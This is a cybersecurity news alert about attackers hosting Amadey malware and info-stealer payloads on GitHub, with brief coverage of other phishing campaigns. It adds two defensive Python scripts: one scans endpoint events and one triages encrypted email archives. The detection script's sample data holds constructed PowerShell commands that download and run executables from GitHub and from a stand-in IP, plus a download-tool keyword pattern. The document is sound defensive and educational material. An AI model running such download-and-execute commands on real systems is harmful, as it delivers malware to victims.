Hackers Host Amadey Malware via GitHub Repos

July 18, 2025
in Alerts

Cybersecurity researchers have uncovered a campaign in which threat actors use legitimate public GitHub repositories to host and distribute malicious payloads, bypassing traditional web filtering by riding on the platform's trusted reputation. The campaign, observed in April 2025, centers on the Amadey malware, which functions as a downloader for a range of custom payloads. Those payloads, including prominent information stealers such as Lumma Stealer, RedLine Stealer, and Rhadamanthys Stealer, are stored in GitHub accounts created by the attackers, which makes detection harder because the download traffic blends in with ordinary developer activity. The use of throwaway GitHub accounts together with the malware-as-a-service model underscores a persistent and evolving threat.

The attack chain begins with a malware loader named Emmenhtal (also known as PEAKLIGHT). This loader delivers Amadey, which then fetches additional malicious components from the attacker-controlled GitHub repositories. Tactical similarities have been noted between this April 2025 campaign and a February 2025 email phishing campaign that also used Emmenhtal, in that case to distribute SmokeLoader. While both Emmenhtal and Amadey act as downloaders for secondary payloads, Amadey additionally collects system information and is extensible through DLL plugins, which add capabilities such as credential theft and screenshot capture.

Cisco Talos's investigation into the April 2025 campaign identified three GitHub accounts, Legendary99999, DFfe9ewf, and Milidmdds, that were used to host Amadey plugins and other malicious scripts; the accounts have since been taken down. Analysis showed that some JavaScript files in these repositories were identical to those used in the earlier SmokeLoader campaign, the primary difference being the final payloads delivered. A Python script found in the repositories also points to an evolution of Emmenhtal: it embeds a PowerShell command that downloads Amadey directly from a hard-coded IP address, cutting a stage out of the delivery process.
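The two delivery patterns described above, a scripting host pulling a payload from a code-hosting domain and a PowerShell one-liner fetching it from a bare IP, are both visible in endpoint telemetry. The following is an added example, not code from the Talos report or this site, of a small triage rule over constructed process-creation events; the hostnames, image paths, command lines, and the `203.0.113.10` address are all assumptions made up for the example and are not indicators from the campaign.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample events in the shape of a SIEM export:
# (host, process image, command line or script block). Assumed data, not real IoCs.
SAMPLE_EVENTS = [
    ("ws01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -w hidden -c \"iwr https://raw.githubusercontent.com/example-acct/repo/main/x.txt "
     "-OutFile $env:TEMP\\up.exe; Start-Process $env:TEMP\\up.exe\""),
    ("ws02", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -c \"(New-Object Net.WebClient).DownloadFile("
     "'http://203.0.113.10/files/ama.exe','C:\\Users\\Public\\ama.exe')\""),
    ("ws03", r"C:\Program Files\Git\cmd\git.exe",
     "git clone https://github.com/example-org/tooling.git"),          # benign: git, not a script host
    ("ws04", r"C:\Windows\System32\wscript.exe",
     "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\inv.js"),          # no URL on the command line
    ("ws05", r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "firefox https://github.com/example-org/project/releases"),        # benign: browser
]

# Interpreters and LOLBins that should rarely be the thing fetching files from GitHub.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "python.exe"}
# Domains that serve raw file content from code-hosting accounts.
CODE_HOSTS = {"github.com", "raw.githubusercontent.com",
              "objects.githubusercontent.com", "gist.githubusercontent.com"}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
DOWNLOAD_HINTS = re.compile(
    r"(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget|start-bitstransfer)",
    re.IGNORECASE)


@dataclass
class Finding:
    host: str
    reason: str
    url: str


def _is_bare_ip(hostname: str) -> bool:
    try:
        ip_address(hostname)
        return True
    except ValueError:
        return False


def classify(host: str, image: str, cmdline: str) -> list:
    """Return findings for one event: a script host fetching from a code-hosting
    domain, or a script host downloading from a literal IP address."""
    findings = []
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe not in SCRIPT_HOSTS:
        return findings
    for url in URL_RE.findall(cmdline):
        hostname = (urlparse(url).hostname or "").lower()
        if hostname in CODE_HOSTS:
            findings.append(Finding(host, "script host fetching from code-hosting site", url))
        elif _is_bare_ip(hostname) and DOWNLOAD_HINTS.search(cmdline):
            # In production you would usually exclude internal address ranges here.
            findings.append(Finding(host, "script host downloading from bare IP", url))
    return findings


def scan(events) -> list:
    """Run classify() over a batch of (host, image, cmdline) tuples."""
    out = []
    for host, image, cmdline in events:
        out.extend(classify(host, image, cmdline))
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.reason} -> {f.url}")
```

The rule keys on the process image rather than the destination alone, since developers and package managers legitimately talk to GitHub all day; the signal is an interpreter or LOLBin doing the fetch. Feed it Sysmon event ID 1 or PowerShell script block logs (event ID 4104) with the same three fields.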

Beyond the GitHub-centric Amadey campaigns, other phishing operations have been documented. Trellix uncovered a campaign distributing SquidLoader, a malware loader with advanced anti-analysis and anti-sandbox techniques, against financial institutions in Hong Kong, Singapore, and Australia. SquidLoader's primary objective is to deploy a Cobalt Strike beacon for remote access and control, and its evasive capabilities and low detection rates make it a significant threat. Together these campaigns illustrate a broader trend toward highly evasive and adaptive attack methodologies.

The current threat landscape also features a wide array of social engineering tactics. These include the financially motivated group UNC5952 using invoice-themed emails to deliver remote access software such as ConnectWise ScreenConnect, and attacks that use tax-related or U.S. Social Security Administration themes for credential harvesting. The prevalence of phishing kits such as Logokit and custom Python Flask-based kits, together with the growing use of QR codes and cloaking-as-a-service offerings such as Hoax Tech, shows how attackers keep finding ways around security controls. Password-protected archive attachments in email likewise let threat actors slip past secure email gateways, which cannot inspect the encrypted contents, underscoring the need for multi-layered defenses.
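A gateway cannot scan what is inside a password-protected archive, but it can still see that the archive is encrypted and, for ZIP files, the names of the entries, because ZipCrypto and WinZip AES encrypt only file contents. The following is an added example, not code from this site or from any vendor product, of triaging a ZIP attachment on that metadata alone; the entry names, the verdict labels, and the list of risky extensions are assumptions chosen for the example.

```python
import io
import zipfile

# Extensions that should not arrive inside an email attachment; assumed policy list.
RISKY_EXTENSIONS = {".exe", ".scr", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta",
                    ".lnk", ".bat", ".cmd", ".ps1", ".dll", ".iso", ".img"}


def triage_zip_attachment(data: bytes) -> dict:
    """Inspect a ZIP without extracting it. Uses only the central directory:
    general-purpose bit 0 marks an encrypted entry (set by both ZipCrypto and
    WinZip AES), and entry names are stored in the clear either way."""
    result = {"encrypted": False, "risky_names": [], "verdict": "allow"}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        result["verdict"] = "quarantine-malformed"
        return result
    for info in zf.infolist():
        if info.flag_bits & 0x1:
            result["encrypted"] = True
        name = info.filename.lower()
        if any(name.endswith(ext) for ext in RISKY_EXTENSIONS):
            result["risky_names"].append(info.filename)
    if result["encrypted"]:
        # Encrypted plus an executable-looking name is the classic SEG-bypass lure.
        result["verdict"] = "quarantine-encrypted" if result["risky_names"] else "hold-encrypted"
    elif result["risky_names"]:
        result["verdict"] = "block-executable"
    return result


def _set_flag(data: bytearray, sig: bytes, offset: int) -> None:
    """Set general-purpose bit 0 in every header that starts with sig."""
    pos = data.find(sig)
    while pos != -1:
        data[pos + offset] |= 0x01
        pos = data.find(sig, pos + 1)


def build_sample_zip(names, encrypted: bool = False) -> bytes:
    """Constructed test input: a ZIP of placeholder files. zipfile cannot write
    encrypted archives, so for the encrypted variant we flip bit 0 of the flags
    field in each local file header (at +6) and central directory header (at +8),
    which is exactly what a password-protected archive presents to a scanner."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in names:
            zf.writestr(n, b"constructed placeholder content")
    data = bytearray(buf.getvalue())
    if encrypted:
        _set_flag(data, b"PK\x03\x04", 6)
        _set_flag(data, b"PK\x01\x02", 8)
    return bytes(data)


if __name__ == "__main__":
    for names, enc in [(["invoice.pdf.js"], True), (["report.docx"], True),
                       (["notes.txt"], False), (["setup.exe"], False)]:
        print(names, "encrypted" if enc else "plain", "->",
              triage_zip_attachment(build_sample_zip(names, enc))["verdict"])
```

The "hold" verdict for an encrypted archive with innocuous names is the policy decision: either release it after a user-supplied password lets a sandbox open it, or reject encrypted archives outright for inbound mail. RAR and 7z containers need their own parsers; 7z in particular can encrypt headers so that even names are hidden, which is itself a reason to hold it.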

Reference:

  • Hackers Use GitHub to Spread Amadey Malware, Data Stealers While Evading Detection Filters
Tags: Cyber Alerts, Cyber Alerts 2025, Cyberattack, Cybersecurity, July 2025
    © 2025 | CyberMaterial | All rights reserved